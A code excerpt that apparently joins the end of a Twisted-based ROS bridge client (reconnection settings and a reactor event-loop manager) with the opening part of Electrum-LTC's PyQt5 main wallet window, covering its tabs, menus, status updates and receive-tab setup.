LOGGER.debug('Connection failed. Reason: %s', reason)
ReconnectingClientFactory.clientConnectionFailed(
self, connector, reason)
self._proto = None
@property
def manager(self):
"""Get an instance of the event loop manager for this factory."""
if not self._manager:
self._manager = TwistedEventLoopManager()
return self._manager
@classmethod
def create_url(cls, host, port=None, is_secure=False):
url = host if port is None else create_url(host, port, is_secure)
return url
@classmethod
def set_max_delay(cls, max_delay):
"""Set the maximum delay in seconds for reconnecting to rosbridge (3600 seconds by default).
Args:
max_delay: The new maximum delay, in seconds.
"""
LOGGER.debug('Updating max delay to {} seconds'.format(max_delay))
# See https://twistedmatrix.com/documents/19.10.0/api/twisted.internet.protocol.ReconnectingClientFactory.html
cls.maxDelay = max_delay
@classmethod
def set_initial_delay(cls, initial_delay):
"""Set the initial delay in seconds for reconnecting to rosbridge (1 second by default).
Args:
initial_delay: The new initial delay, in seconds.
"""
LOGGER.debug('Updating initial delay to {} seconds'.format(initial_delay))
# See https://twistedmatrix.com/documents/19.10.0/api/twisted.internet.protocol.ReconnectingClientFactory.html
cls.initialDelay = initial_delay
@classmethod
def set_max_retries(cls, max_retries):
"""Set the maximum number or connection retries when the rosbridge connection is lost (no limit by default).
Args:
max_retries: The new maximum number of retries.
"""
LOGGER.debug('Updating max retries to {}'.format(max_retries))
# See https://twistedmatrix.com/documents/19.10.0/api/twisted.internet.protocol.ReconnectingClientFactory.html
cls.maxRetries = max_retries
class TwistedEventLoopManager(object):
"""Manage the main event loop using Twisted reactor.
The event loop is a Twisted application is a very opinionated
management strategy. Other communication layers use different
event loop handlers that might be more fitting for different
execution environments.
"""
def __init__(self):
self._log_observer = log.PythonLoggingObserver()
self._log_observer.start()
def run(self):
"""Kick-starts a non-blocking event loop.
This implementation starts the Twisted Reactor
on a separate thread to avoid blocking."""
if reactor.running:
return
self._thread = threading.Thread(target=reactor.run, args=(False,))
self._thread.daemon = True
self._thread.start()
def run_forever(self):
"""Kick-starts the main event loop of the ROS client.
This implementation relies on Twisted Reactors
to control the event loop."""
reactor.run()
def call_later(self, delay, callback):
"""Call the given function after a certain period of time has passed.
Args:
delay (:obj:`int`): Number of seconds to wait before invoking the callback.
callback (:obj:`callable`): Callable function to be invoked when the delay has elapsed.
"""
reactor.callLater(delay, callback)
def call_in_thread(self, callback):
"""Call the given function on a thread.
Args:
callback (:obj:`callable`): Callable function to be invoked in a thread.
"""
reactor.callInThread(callback)
def blocking_call_from_thread(self, callback, timeout):
"""Call the given function from a thread, and wait for the result synchronously
for as long as the timeout will allow.
Args:
callback: Callable function to be invoked from the thread.
timeout (:obj: int): Number of seconds to wait for the response before
raising an exception.
Returns:
The results from the callback, or a timeout exception.
"""
result_placeholder = defer.Deferred()
if timeout:
result_placeholder.addTimeout(timeout, reactor, onTimeoutCancel=self.raise_timeout_exception)
return threads.blockingCallFromThread(reactor, callback, result_placeholder)
def raise_timeout_exception(self, _result=None, _timeout=None):
"""Callback called on timeout.
Args:
_result: Unused--required by Twister.
_timeout: Unused--required by Twister.
Raises:
An exception.
"""
raise Exception('No service response received')
def get_inner_callback(self, result_placeholder):
"""Get the callback which, when called, provides result_placeholder with the result.
Args:
result_placeholder: (:obj: Deferred): Object in which to store the result.
Returns:
A callable which provides result_placeholder with the result in the case of success.
"""
def inner_callback(result):
result_placeholder.callback({'result': result})
return inner_callback
def get_inner_errback(self, result_placeholder):
"""Get the errback which, when called, provides result_placeholder with the error.
Args:
result_placeholder: (:obj: Deferred): Object in which to store the result.
Returns:
A callable which provides result_placeholder with the error in the case of failure.
"""
def inner_errback(error):
result_placeholder.callback({'exception': error})
return inner_errback
def terminate(self):
"""Signals the termination of the main event loop."""
if reactor.running:
reactor.stop()
self._log_observer.stop()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtCore import Qt
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum_ltc.util import bh2u, bfh
from electrum_ltc import keystore, simple_config
from electrum_ltc.bitcoin import COIN, is_address, TYPE_ADDRESS, NetworkConstants
from electrum_ltc.plugins import run_hook
from electrum_ltc.i18n import _
from electrum_ltc.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates)
from electrum_ltc import Transaction
from electrum_ltc import util, bitcoin, commands, coinchooser
from electrum_ltc import paymentrequest
from electrum_ltc.wallet import Multisig_Wallet
try:
from electrum_ltc.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum_ltc.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum-ltc.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-LTC Testnet" if NetworkConstants.TESTNET else "Electrum-LTC"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend litecoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request litecoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum-ltc.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('litecoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-LTC",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Litecoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Litecoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/pooler/electrum-ltc/issues\">https://github.com/pooler/electrum-ltc/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-LTC - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are more then three
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received: Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received: %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-LTC", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-LTC", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
if self.fee_unit == 0:
return format_satoshis(fee_rate/1000, False, self.num_zeros, 0, False) + ' sat/byte'
else:
return self.format_amount(fee_rate) + ' ' + self.base_unit() + '/kB'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mLTC'
if self.decimal_point == 8:
return 'LTC'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Litecoin address where the payment should be received. Note that each payment request uses a different Litecoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Litecoin addresses.'),
_('The Litecoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
